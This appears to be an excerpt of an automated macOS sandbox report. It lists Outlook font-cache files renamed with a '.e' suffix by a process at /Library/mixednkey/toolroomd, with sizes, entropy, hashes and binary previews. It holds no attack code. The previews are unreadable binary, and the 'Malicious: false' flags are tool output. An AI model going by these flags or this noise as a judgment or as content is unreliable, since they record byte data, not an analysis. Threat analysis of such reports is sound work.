.^......s...1_.:....4r.....Ao.\|$..p......3.CM"..g..$g.M.....0ar.]w"c.K..dOwu.....A.......fh...P..X.....I,.Wvjlm.PP7..<.j^...&.........]..~]....sz-.\|~A..yQ.M^.4./-M.k."...._...&V...7

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.RaananaRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1050
Entropy (8bit):	7.240290175480696
Encrypted:	false
SSDEEP:	24:ELA1ZXRmBzxO5jx7dzH/ynLaQRsePc0m7:E4Bm/Oz7ZHWLRNpq
MD5:	74F59771E782931EADA82B9D8E0CC229
SHA1:	381D728C5396C3AF6B36AA5C07C73A76FB293714
SHA-256:	5A89CC4D85BDB70C3CF0FBC979DD708489DEF1E4F38AA5CC61C145D69F71B79C
SHA-512:	97217FFA3B6926D550619F8F2B0FBEF95ADEEC4F3526E5B8AFD94E2487F15EEC43452ACD6C78B4BB5E3855F0E29777A4CE89E4F66A334180CEE08A8CE6E3F74A
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a?....q..3...z.;[..+.Z.....8.LTl.Y.eH.... c.<.....K...q....g.<.V.....#.-......c.#n...4..G.6.?.K.bY....\.....Quw..f...._..$.....t......8C-}..%.t...s..&S.Mt .y.\..mIN.y).:...=.+UR:.\|..6...t.....yF...}].<.j.t.2.zo..}xy....z....9=.w.W)..\... Fc5....&.d..WQ.p.E.M.}M.<..0z.I....O..<....K.X.^..tr.......aUU..b..{bL.xa<.K?.D......t'..0M.hd@.]6D.\|...I.S.....}..q..)./9.....{.....7=U....\..{.f.Zht_#....R.8..~..9...h.F................b....7XiRcD6..1hj(.,,.V._.Ao.x....K6.B..mL.......k......%.9..F..;....7.A.nB.~..g....'.....L..O......Y..o.3/.T..5.2.v. .#x5.[9..J.........1&@.H.!.....F....#.>...>.<u.{....J.N.5.Kn.I...`..R.n.C.wj.6.vZ..J.....y.. >.R.Z7.E\.:F.I..=.....................\.........^./k..`R..V5..jd..ysVT9.X.....wS.I3..B@...H.xB..UI.y.3.Q...KJ0z.BQ...B...L..Y$.m.DT..s.K...w[v.XV;.5T.I...U^.V...v.&.9..1..................................................................................................

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.STIXGeneralRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1626
Entropy (8bit):	7.545306473716351
Encrypted:	false
SSDEEP:	48:YuyvETPYNxWJ2MbJRUatnA5+oEnp55GNpq:SvETCML5nAgzxGu
MD5:	6CB8902B4B048FFFFDC6DDEFA8D6CEB8
SHA1:	2AE0F686D4810D2277AFDA6389DDBC86A069D19B
SHA-256:	2163503BB64CB76EA2AB7C9E12ADA01C893175BB819579661523ABD94467DD7B
SHA-512:	51DD8941CEA0F796492C8C670277C70C955BA78C38698CCBF02F871E189172D220F8399765E27632369C819573EF6B82B606A57688CEAE49469D5C16ABAA150B
Malicious:	false
Preview:	.<.\|.....f.A....&.\Ef..j.=..$,.K..T..i .Y.a ..\|.t.G...>...[.....Zm..--...-.u....P~......d.:I...._...7..zl2..!$....u.+..h..{~:...,.>.....@.H.......d.....e..VA....G4x.f....q.}...a.E....2..^!....5....rS.4...y....b....D..7..8.mXY.0.#....]t..Y!..R.h. .......'p...3....a..;.!.:.Q2.....d..zq-...[....@Q....i.i"._.b..I.[.r"FLu].y.P/>..V.~]..<6..&9...\|...!.^.. .Pbo.>]....8.wg.....@.u5l.'...x.....D.Mp...6h.lU8...<-.t..S..Dl..NF.UK.V:../..k)I.3j.2.p.7...Zd.jFdp..O ..n.~.P.2..}.......M......o3.<.2...Y...Y.n~....&T.7;K..!.-.......T..6..?.2..kh.9]&......H[........]......pp.W.....K@!.m...O.....j....#@..!..\...MB....,.5f..d.r........A.~...].y..9...RFH...F.....a.nq....f.dzY.M[j...>.....p2......\|.R].U...A...V..cn.q..}..br..V._0.<.0.R8.T.OXF.).....!u...&.~.KC...<S..?..n..y.K).0..x..ge.\VHN....)...*cm.o.w.\|;S..y..".8.8...b.D..{.H..{...Sv..PM...>H..OI.;...u9...Wy.Z.......D.zD.......f.1._ZP...0.! .Ol..2....._..i..@.....4Lq..d58... ........4j..E..........\.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.STIXIntegralsDRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1890
Entropy (8bit):	7.633914239127014
Encrypted:	false
SSDEEP:	24:XbtIWq3UfEPhB66X8TX4SGJl6ystSzy+pwWhGnHgjV2AZJjQOMbSbMFlHncqVgsF:5IvZB1MUs0zhY+VrJjDxgtVgNpq
MD5:	662C31834AA827064607759A0E2B0C05
SHA1:	AD23F2CE3588A8199B85EA4FB5D79B50C1987DF9
SHA-256:	84D3ECA00211697631B25D7DE510B775DB9EAAC422E330EB419F64BE8D4735BD
SHA-512:	50D061FE3000D4D2319FB0D279DCFD829BB00CA15E586895ECAE438D1E9AAE4B8A03EFB019F5286E79D0FE2C7B137CC4E1D391CA0DD8F9B4B917594CBE089C10
Malicious:	false
Preview:	.<.\|.....f.A..N......H...Y..Jw\|..:.H.i .Y.a..Iu..]=.0Q.(...2K:\|z. ...a..SJ>...O.....(cKr.-..;O9......~.#.Ah.o........~..M,}d(#......DJ<].^.K...R..'.d.....Z...R.n.C..H...\.e8...\.....Quw..f...@..i.#Y'za.(V..."._p.l....8.5d..B>..T....p2o.y..^A` ..g.u.$.........cI..N+.].f4.>[......+...9.Q.c.6.a..\|...[....D]h.Z.8QXe1T..{.4.>..d..]./o.(\.i.%+.....'.h.R...T.>...b>....s!..5e%3#.v..koL.tL:.x...#mXA.../..Lo.wo...y.!.].&.Fk.[......_K.J..t.6{.LD.R..8.A.r...P...$..]s..2...,...\.3.)......B...Kj.M.p,...\|...~... v...E.......2z.U.@L.X)...0bZ.w..q(.....,#./..@......jj7.96.h\$M..$.8E..'.K....W...mMc...!..E....A7.a..+..q.....Z...}A.<a.'.kd........c.......A..~. .$bS..SG.........y..._E...E0..b.W..>q.gd.U.mf_..B8u.....j...%..]i...lG...8<..[.y.2.I..{. 1.....Z..9:?.8..\|3..p.NmrN.#.n.....&........D.....k.J..4..n..P&..O1.w#Uj,4..../<....b.}.\|...6..X.Z...\.G..R;./.I..q.. .P..E."nw.....q.....LQi.M{.....>FR0o.c.^.F..Am..?..Q~r.C..).%./B.........f.v..Tu.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.STIXIntegralsSmRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1906
Entropy (8bit):	7.63385520627991
Encrypted:	false
SSDEEP:	48:YuVQpshNk8j7ZnCtvk2IhQmcmOrstavRNUDBNpq:qpshNks71CtvPC5lOrmoN0u
MD5:	B224DC1E4F917EC2EB6C9AE70005A136
SHA1:	5D2E7E7CD484705D14EA1F6FADEDD33065C92384
SHA-256:	D3BB9773FE129792692E0BB4F27BB8AB0431DB573FBC5545E1008C4182B22DD4
SHA-512:	2D0622614CF96C9F42B429230F89F8C95CFF6E20D9E48C4D09BAEA12D218FF83AD509C0D87D5DAB62858783B3B464145101717072DC3A692F4E8825FC98D529A
Malicious:	false
Preview:	.<.\|.....f.A....&.\Ef..j.=..$,.K..T..i .Y.a.3T;v...9E..U .b.ow0..%..0...&.Q...t.Pp.v)&.bp.5hM)...$!_>....<..`+Z....:"T..Q.`m.T....K..l.c...q-.<..../W.M.(.B..i.H.:..i.H.:..i.H.:..{..=...j..Be.......v3.r.....K..........T.8..I........t.. .a.... .G..............#......b}.A........~...U...vF.<1...<.C?RcR.3v.J..yZr......O.......{Wa...E....B..e...pi..E..3....~Hk........a....s.....Ll.9z.....#.U.E.n?.b....Nw...\|..k..Q......l6...3..b..c..[,q...{.Z.....VJ..?...........&N...=.,Q.(8..'...5x:..:..4^../F..............i..-&.......J!.$.U;.....os.y.x..pl..o..w.Z5.Z.]......q&.Pp.>j..!..0..s...QZR....pA[..7.-YP..p.0W+..b.hm&5..@.$.A*-......uX....b....'Tl..0ND.Cu.n.V.+G`.=..Zs...j]..]_.....b.F.e.D.w@S.)2..H.a.4;.gU:.....Y.O.GY4..l.e.3.I......w..{........$[..a\.j.P.K.p?.......c... hl...z..N\|.b.rR.p4.!.R...W.%.8..i.Ra.".....K.......~.`{..H9+.F1p.M..`...Q....U.."._...B)M..-..\...i)..?...X.9%:}Z..[(..o.f..$r..i^YN.....75b....z....s.(..Z\|.u.....n.fr..

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.STIXIntegralsUpDRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2130
Entropy (8bit):	7.685073167371245
Encrypted:	false
SSDEEP:	48:GZx55SGZwg/sh7xQ7N8CSuiQJkKi4OjcUMdPBEgN573Npq:40GyhWJjA/b4OIdPBZ7u
MD5:	86A392F68D885FC8D5FD57B85BAF5870
SHA1:	0753614C4E8CD3A1B541B1DA6F59CD38B2F49CCF
SHA-256:	4AF9DF67D9AB37F353AE013082F46622CBF013FCF7C70798E5F1D65AE318EEB9
SHA-512:	A639734443F6AFCADCDF6B41EB9F133CB264943249A7D33171C1EF4B27FD595E2C4C6E9A8E12D5E1FAE50C2B5359E101B584CB4496820A9DF948D0B5ECE0D8A4
Malicious:	false
Preview:	.<.\|.....f.A..N......H...Y..Jw\|..:.H.i .Y.a$.X.u.^pY.$R.>....$\+.=..-7o.#..%3>.+25.....}....g..I....mv.(.gS..?.E.[:......-x.....c...i4\Y..U..M.2..c$.".u.9).d:~o..O......uFh#..9....=J..D.B...B..\|K%.b'..$.".u.9).d:~o..O=..&...U...c.G.<..}c..S`."7\.8.. .....g\".N...{.E......^A#_^..a..0o..S{.......x\..trhi..K...QvW//.. ......(..{..3...1Z...$.p.&q(Dwb).=...$..1.."A.]...V...'.E..K.<qq..v..e.....#_2.f\.....X$.H.............4.;......Nb-..%-.....T5_2K..u..w.0.........1/b..Y.i.ktVt.. .2IFJ].ih.F..\|..Q...i....l..9,.~yG...5z.b....-.j,.^h.Y.-V.._.....hI...$ ...\|l...?.)g.'..UX.K4.@.W.F....C...TN!L....1.........'=.w#m4.0.vo.s....^..{c..2.#..I^.2......8O8...x)I.#.hiT.?.%`..Z6....U..W&2+p.........4.1^\|s,.%'.......E./.F.I....I..T.....'..Z.km.4.!.i..r.WVq./.....~..D..j..z.h6....V.(fXx.....I.....K...Lw{.>.C..'...;.4.d%.Y..Ln.....,S..v.$7......w....'.....J.Q.h...q.^t..VZ a...Ej..T..S.!c"/.j.P.?.B58..q.7=..j..58.E...u(?].U.@\.m.....&5.(.f..g...]+.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.STIXIntegralsUpRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1874
Entropy (8bit):	7.6293118298179685
Encrypted:	false
SSDEEP:	48:YuAuFjEsDFV8uCPN6qj8IlwolY1m0QaNpq:gulpCPN6qAAzCJXu
MD5:	8CADB052DC94F1A49DDF523D8C156F8A
SHA1:	6B9F746D836A1E334FE6EC904C2E996D3424DD84
SHA-256:	EE6FB8E695179017AFD1E348B11DAA3EA494D8014D8628EA8945ED40C9AFA2D2
SHA-512:	03F71087B6D223403AC5B31E36F32886EE7EDB47415045565CF4AC035598153696C5FBF816EF9B6B6EE2B84332F96135FC80F7066474EA7BFF822210D0ED9D99
Malicious:	false
Preview:	.<.\|.....f.A....&.\Ef..j.=..$,.K..T..i .Y.a...\..1 .....].z...24....>].N4. L..d@...F..Z...Z...K.l.q.n...%.........T..-`.'2....9..v.0........p...&....v.&....v.&....v.]K...CuP.U...s..f0F.....#..\.%../.0...kRA..#.....m..S-..So..a..v.>.3M_....}...!.....1.....+..7a..!..Fk....6...=...jk...5L[O.u.G....(.-M.3.L..I.....q...38.......P....+he..X...\FC3.>.\+`:.E7.^?..Y/j..P.KT..7..G.....5W,..D.B....@......t...wYKx....X.k........N~.{....J....0.u.[.{u..^R.n!!F.....B..\.5.`a.....=^U>.CE"......cJ....l....q.....).._.M.I....?.u{...^=.......Z..bkS.f......P..\|.%.n\?(...x..v(K.....?.e....1=. ........].../..Jx.bk6..`.r._..C...\Fw.7.1._.}.)4<-..nQjj.}...Q...]\|h9.[b..K.'..q.....2..J-M.T.?RR$..M..v...b.6.]...4.9.;...WB.AZPQ....Z.n...w....7(XP.-......{1..!..j.D-.z<`F.>.y.0...7..K.-.l..xO+.2^,.......A..._.y~..1.GD....x...B.....0........u*2/1.......l......vxT.H..O....PUU.K.s...0.-..4.2Wme.d.....X.!B......j...{.?...Ib..E.O....`...Tv.'....(.9Cr..6.E

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.STIXIntegralsUpSmRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2042
Entropy (8bit):	7.670885069782217
Encrypted:	false
SSDEEP:	48:YuR3cdpYgAZX6uw2dkldv6BlOoyS642V5Npq:xWYgAZX/ulQBlCNvu
MD5:	EBB822A82A71781EF77E02FFCE6DD28A
SHA1:	A4620ACF43426AC45926234514D67482F5F87EF9
SHA-256:	4C4EA46FCEA315ECD5287D6BB1B40AC92409E8EE6E6D6E87260EBC39B3016C51
SHA-512:	564360B9F8D8D070F77F1130D1BCAED1E9D79DC60CDD528A5E375447D8A0A24DC981950EE738ADD9BDA6A845B9B060F1F1D7C78E6494BD33D0C88E9DFC41B388
Malicious:	false
Preview:	.<.\|.....f.A....&.\Ef..j.=..$,.K..T..i .Y.a(w.`z....0..^Q[s..C.q...{.)D.x....;..)Ci.'..Q...x....Oo}.`.$.......z._^"wW.z..._...u`.@e..s.>..'9.'.h$G.i.H.:..i.H.:..i.H.:..&...>H...9!..y%.....Zv`.#.+.J...jI..;.....K6U'a.....A.02p......R...[A...........J.=TP.....^J.B.+"mZ..Tp$......tq..Q.8<C5j..-..=..mN.1,.V...../...2..>.?Kn ..O}`w..Q.G.V....3q....O3J...P./......T.U....W...X...I5..D...1...]..0(...~18..?kL..p7?.?...%.w.Y...z....KV..DIa.C^..4Z..p.^_.g.:..........\|s.+.I....;.:.:..>M..Y.$.1<....k).{......O..X&eKnl..[..(6Y.../....;.V.. :q.=.2..LG...u..I....g.........l/...WM....2.>:a.E....s......n[.......Bj.X..TG...{. .W..'5r1.&.M9F...:P..5./._\.=.....Z..Y.....K.D%.Y.?..l....f....tx..V..F...i/E..vD.)..i ..,n.T..5..h}g.<........s...".I.U. .6^...^6L6..[..\`.v\|.q..L.)^..z...I.A....9.%..&0..Ut ...+.t.k..c^.M..,.8.Z.....@.Z..z.E~.S ....zW+...`.J.Y..05..\...U.Y..5e8*.....$..3..]KM..ibX...&uS.-..t.n.i.@.:.......{9.F2...FL....[o.&>439)\...MY.z..

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.STIXNonUnicodeRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1938
Entropy (8bit):	7.641897157405304
Encrypted:	false
SSDEEP:	48:7XG2skgKY5wZnX8vQGqmFQ5XKCZZIp3Npq:Tobb5wZnX8NFQr+3u
MD5:	2433C6F2C43A69354C063B40C57624BC
SHA1:	381947B395990129BBB3D8F8FB0E6D52AFB8354B
SHA-256:	A985B6A38734CAC4E64A74872FAF5A56E02C3859A0B57DD067188676F6529D9C
SHA-512:	9A788869821C6DFA472C338741695AE8896407FCFD5064435373E0B4E40F5E72336B5FD4751A5BE0FD681AA5E5535306D01D21EE9922E15D46BD538509D6FBAF
Malicious:	false
Preview:	.<.\|.....f.A....g.$.e{.VM...J.d=.!...i .Y.aU.......}.......Y}..I'.......vA.=..m.G.;.P.^.zV..X...(....\|.e..W...HJ.Ex.......r'.2..K`,..Y`v.{.6.....,k.PY.zd\.=J..D.B...B..\|K%.b'..$.".u.9).d:~o..O{.Q.{q<.~.Mri..k.:.6V.........K.?g>N5.Q./.q........hT.?.E..w. .J...r. ..g....c.....K.4...H0.-...Dx.....Q@.'0^./..\"...._.Uv.m...y/..u.."uo..<.v@n......A..LVH.h..5......=.w...:E.g....b(..'.E-e~....... .:...c.4..M...)....Q#.R.{u.Y.W..\|.?..0.C..Pd.w1R..Eg..Vq....qS..d......^..Z...fG"O....lE!....I.3...=...'../n.O...[.G..&.C.........^..0.x.e..Z.;.G.......F.@..L.._.../V/.>.4r...E..R..>Z.....q,... .i.F.,\..a....I.G.!..M.,..Rm.A......<2>.Z..h....R...\y.......g.Xr.Ls.s...G9.f...JX.G.....D..?..j.v.'.bk(w.9.^~w;8....J...I..[.t.P........g2v.&.C.?.......v..N.q.N.vF........P..y>...c....n1......S.!....1 .D2...-...[v.>.b..Xr"...e"....n.~..)W[.-..\|.Ad......(..I........3.....{m..l..t..i8U!......<a4.....p...eIZ5.~..NV..f.2....:...K....Q......4..`,\|

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.STIXSizeFiveSymRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1714
Entropy (8bit):	7.5907153595240295
Encrypted:	false
SSDEEP:	48:EQARq396/a+pKLgLQJderIXX1PIUHdXh4BUNpq:0u96/a+kg8JTPVAUu
MD5:	163E4A31D8F94AFA0261082A724A2085
SHA1:	54266998E57DFC6EE145D031D4AD08D9061B980F
SHA-256:	94C5C242E1386B9E0EF76659B8BB24BFFDFB0F394D002ACD6B580C81832E8378
SHA-512:	B6A315B138A26AE80BBF60C017B03F19C99F11E76124F14C59627B56FB319193552C284C8D33E208B9A59923DDAFBD581CC5FA534A17D539C3FE8664DE610466
Malicious:	false
Preview:	.<.\|.....f.A....k.O.4$]..;Z\|d.7..c...i .Y.a.o...DW.\|U.H...o."+.....T.#+...%3X.Vq..v...!..tI.p..B...M6.M..y.."v.S.5jv........l....!..>.{Q.3b.X.w:&...,.q...^7,.q...^7,.q...^7n....@....U.....v{5.A.~....ESB..G.Z..1.[1..1.+.a..........z&..G..Y...6..."W.....R...g..!(..t.7D..M2..51..m.F...c.SX)7.....!=U.j..V....u.w.M..-.4`.U.I6=uC.........E.ySv..r.......u.r........HL(+0F...N. S._3......!B..s.......N.......>.xC.K7!.......-d...>..-5Ry.V$....T.S!.w.#...%.2.......,.K$@.5(</X.....S.Qw..YW`N..N\|..g....>.0ql..._&.q.s.g.>...Bd.Z...l\|"V>...$...3{...p.nbg.hN.UO..R....=..R.Y..?b.....;.S..~.x.vb...dg"...z.[.QG.#eV.S}.......7.??[...#..\|...q.w....,.E..J.j..s.S+.hi.@..@c.b..Iw....^y.#\yN.,0j.Y..K.D.....-a...u......S...i...Z.u..FW.jL.!..*...Rx"@.G.A..)V8.....U.v..am.m..L..kJCB.X6..!7.k.<. .4.{.Q.....`.......1.......=.C...k....... ..?pW~..X..3.._...e@0....4.....6...^.Rb...C..`...\|7.&y.........Q)Q3.4.... :.ly..a.!.b......&....jC..-m".J.I..!MX.kp!.@..T.......=.F.....S..o

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.STIXSizeFourSymRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1978
Entropy (8bit):	7.635991627597677
Encrypted:	false
SSDEEP:	48:G5M8nAzeTR46ubxY+dxCdw6Nb/E9+0wNpq:fq7RmqqxCdw4/EGu
MD5:	13D4DEC99A3DC26601EA903E01538768
SHA1:	7F3653716996C2734DEA026CD6B9BDB4D9626CF4
SHA-256:	9CD9BF6BA635AB23CBBCFCECF45E8844D487B721F1F2466FBD53184D75CAA169
SHA-512:	28F4EC41034DB49F84625DABCA7AF1E7C9E7AAFB4A7E91D7193D0CE2F70C79F198FCEF1FC23669F12C4BDFF70D7BCEEFFBFD244DC332BC2ACF54953E1803B779
Malicious:	false
Preview:	.<.\|.....f.A.......^..+.....y<.).!...i .Y.a"..}S.+.:...3.._4......L.1s..%2.....!..+?5...{Z.E-........c...w.Q..I..Bm5R.......&B..P......"o"<.zZ...jI.Z../.izBPWy......+W..#.Q....]...Y.M/z.....7.....F..d'.rr.G...y...d...3.w.H%0A.G.6 ....Rp...@.L...QR.<0X.o.`-==..g..]T.....X%Hc.Q.e.".m..Ci<.....lD.TxHvL.QN.....0..!..'..x..1...f..U3.....C.M.Y9..(.xF.@T7H..;.62...'...4x\.L..%R..).U.hZ...R.I.F.?,....N.U'..EN.....>..$&..e.)CwV.btn..-fQS.1p..6t....d...S....f.Y[...k..^gf.E=....P...2.Dw.Q..p.<".J..s...0.9@..8..?.......~.>..n.jA@N0O....=..\|.}NL....dA...`..J._T...i\|..*=sG.o`...m3..........Tr....R.....p>.t.L3..v.i.....C....5.jp......j1...\6.b.4..0.;..(J}...E.Y.1....6.eO.R....>\|d.D.O....Z'...>......6{.....y..5...V.w..[...}.j~9.&..JZ>..((...^C....$...4.p.z..._3r..9.)f:6....v.U..}r..q..3.y.76...JK.k.`R...o`G.)\|.C...n..,i0...3.o.N?.....?.......%_...R.F..Lw/.......)..}.b.....j.h.'.....q...A....=..A...1...D?jqSm.w.bxb...l...os..OG..1-..Fs6..t...a

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.STIXSizeOneSymRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1850
Entropy (8bit):	7.610311900322595
Encrypted:	false
SSDEEP:	48:TFpgP77D052vgwPL8cmK3Ab5g825xjY7kUmGNpq:TrgP77o52vfzgnGCYbGu
MD5:	6CC17F90AC363A534D61F753C05FF386
SHA1:	878DCD766CD01DC12FC69D2E28223C2B6999499A
SHA-256:	181318A57D2553CB0F8FBCCCA6F84E2AD602715C60EBA4C6D0A4B9C0AEEB59B1
SHA-512:	4640311F0D91EF2EB0310F879A4357A6717A6497BB0DC858840AA2F996820AA3863FCF1605D69AD695FF9F983128105FFC942BADADECA91347FB255F040AF05C
Malicious:	false
Preview:	.<.\|.....f.A...m.......jY .N ...6...i .Y.a.p...."v.....qz....U..Z.(HjB...3[.#.G...Ez........M`.....lh.t..n.zW....3...3.l...s+...n..........{..\e...X..MU..g...W_.....j....vD.&...j.$Za<..W3.=P.LfH....=.P......a..t...... p.........A87k.+S.EgEI'(...-....gl..-..c<!.G.N.j.:.Z\...,.n.AU.IH....m.l..W4lW..8}>..+1...@.X..I..(..@.R..........a" !eP.Z.SE.n.V(\...l.7jfuV..~i!.{.v...? &?.k."e.....ToX...?.=..t.>!.;..Q. ..r......`....$...(.}f..!29..5-...Z..l.....k...lWz..5..e..C..........6.E..C....e.CY.).7...^@..2.?...g.Iq.(.DpZ.......#...j.D...%..+.D.cM&[..".h....X...8..nT.0..v.d.a.8."..._....t...M....~.>.+.E.. ..j....z.i..f...pCs9.T..kk..I...F..#....#....._..^..:+5y..X......'#.n.N.....z....SY.......D+f...+.5....F3.f=k...0w....&\.k.W..8....{>.8....0L...].F..m.s+b..S..h.@....8.,...j....j.dG.B.Qt.m...v...j..I6B....(...}.2h2.;....m-+.s].z...].qf4k.(.lTqM.Bxr.R_...J.8..$..L.....P....sO.G...T..J:..-+uM.5...?..-...R~T..?X.9.k. .B.".}.....w0,..N?^u....

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.STIXSizeThreeSymRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	2162
Entropy (8bit):	7.693042419637983
Encrypted:	false
SSDEEP:	48:kL5lU28wUWHIR9OLw3F/sLN/m8Q8RROpBZWNpq:k3UezS941LNu8Q8DOpBku
MD5:	A002BC9ABF0BE97C67A7F95D644EFA4A
SHA1:	B62304BDD0B9381532FB80BB834775F3EFCB9E0B
SHA-256:	F55A2F1AEDCA3F5B71558E4321B9C5C70865C49C8A7DE6B4F9CD06362E947E5C
SHA-512:	C9EA07702469EC93E9ECF026C98AC354134329CEB43BB6476CA6EFC52A59A47DA9B65310A12CDE81ADA807B3C0B83A1A9242E55AFA0A25F193341773F543E877
Malicious:	false
Preview:	.<.\|.....f.A.......^..+.....y<.).!...i .Y.a...Syp.o....h......z......3.I.Rpk.....4]......./../e.G.z.0J.p.i.h.!. ..P.B.#...K..H..Y.M2u{...~XV.7.A(.g...K}.&.^r..0.%...............Z...R.n.C..H...\.e8...\.....Quw..f...@..i.#Y'za.(V.._..pZ3.T .K.Kl......L.9.b..Q.............D..)....S. .Uf.U8.....G0...b..w...,...WBXq..k.n.N...Bt.B..Q....L.QYK...\|i<.PC......^....c..&3'..D.X.dE..s~B..>.Q.IXb...KV.yZ\....$.....u..9..x.....f].f.......n...,....6s.=0u.-.q\|F.V}B ..$........Cl.....eX.w..n......"x.?w..-.o...t...N.h~j.V...+...z...C_"7<.d.\|/b....#/.Or'1.....a.?...i...j..b.f..[..z._C}..E56H..c....q.}....l...]p."...r..nW....j......)....{..y=..P.6wq.Y.d....Z.1.5%..P.Y..w....bQV6.d..:}xYe^....pp.!::..SX..P.T.;U.._.Y..g..."........:#...~.m..).....h.I.j.._.$.w...#......zKA}...1..p.>.... .~.D.e...r..o.. T..2a..N.P.......... F......d.."..[F...w.W{4.8+9..{.:.....=.8NJ+.. ...8g..'.(..LP/.k.-r...Gj..-*s.kO......3Qh.v<.R....S9.K]..~.R2..jT..irQ?.\|....R.H.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.STIXSizeTwoSymRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1914
Entropy (8bit):	7.638432747097227
Encrypted:	false
SSDEEP:	24:xqAOvYS8ZdA6n01loeIM/2sLxoKaFkFlmBtAL9VU6LjS5SWv7ucv8rsePc0m7:x74dV9/2sLdqBtS9W6HSgWv7HGNpq
MD5:	52B29AF776776831255D7FB3E6A9E0CA
SHA1:	B42844C899BD8B171C042F4BB168A42219320B8B
SHA-256:	B60F0C2238D6E0485DFEEC1AA94F857F157B2EF30E21233B2B890AF7F3446272
SHA-512:	C481489DC37D705260C1756D192FD083E62A8690412B84017C1B42EE1CD917FAF1F3BF6945866C731329D49C54621FAB9908A454E9FC78B64EBB40ABFE9C5113
Malicious:	false
Preview:	.<.\|.....f.A.....;HS<9<...1FZdU.x..Q.B.i .Y.a.......Q. 9.m.q_..w67..H...._.)C..H.D..?]{..s......lmI1W<..g........c.$~?1.X....(..dj...Y...33.RBRo...A....#.Sd.`<I.z.....7.....F..d'.rr.G...y...d...3.w.H%0A.G.6 ....Rp.\.u.e.X...B..LAE....?..,...#q.r0y1..i.r ...].i.o....../..:.&..I.CW....l./f(..1/u+tF..3-S.P..?.K[....A....8...e....V....Q.(.....c...............tm.......]d.OUY..(E/{.6.."V.:..i..k...$.=0[.....n..G...........&u5..4.'7.....A......s.s6.5...\|.....<@5...+.......0....:.K...SU5._:iA.......T@.O..w\|a.z[f./..{ ...:\....2+.....U.......9..........7<L.\..7.........q.!..8.^1...z.C..*xd..VxE.v...O.Z."<..%.]...C.Y.T.....+v....u{v.%..N.t"..v.a....0..:=o,%28.d..L.X.[...............[.D7...0V...g.{.......H.Ux.s'.N..a2$A.......nf....-....N....Q.:.:....fGH.dl7.....(..Y..R....n...3...MJIG.....I-HL.%^U......5:.dp==...].......\(3..9....?..\|.-...Mv...............=t'.........RY.i......0p.....~K.`...(:.e..?.%W..>w\|...UD.d8OX.g#y.tO..\|.. #B.....<.+....2.C+.

/Users/berri/Library/Containers/com.microsoft.Outlook/Data/Library/Application Support/Microsoft/FontPreviewCache/en-US/.STIXVariantsRegular.png.e Download File
Process:	/Library/mixednkey/toolroomd
File Type:	data
Category:	dropped
Size (bytes):	1650
Entropy (8bit):	7.557067009022954
Encrypted:	false
SSDEEP:	24:YuNtPp1KMTSRhY/6txc/YD2+dUtqECHhbFPKc5stLRnLVGvpMiq+/qsePc0m7:Yu3p1tmDLxlTSqEsdKc5s5TMmi1/qNpq
MD5:	A1118ED9BA8F05324A3461E0FDB0D42B
SHA1:	A2DD159E2156CCCD4DDDB1421507E176D83CB772
SHA-256:	4A3C3E7F982F8B37CBD3FFF2CF49FCCB9D7EFF26655E68185507F1B8C0EF1A35
SHA-512:	B3A7518DD97A7271FB1CA6FFD33DC5ABA1551E51D74AAD7F754D303C1262B2D7147B2D379CD89A95138F76EA8B4413D0A6D58E359865F6745D3B028EAE9FC8DF
Malicious:	false
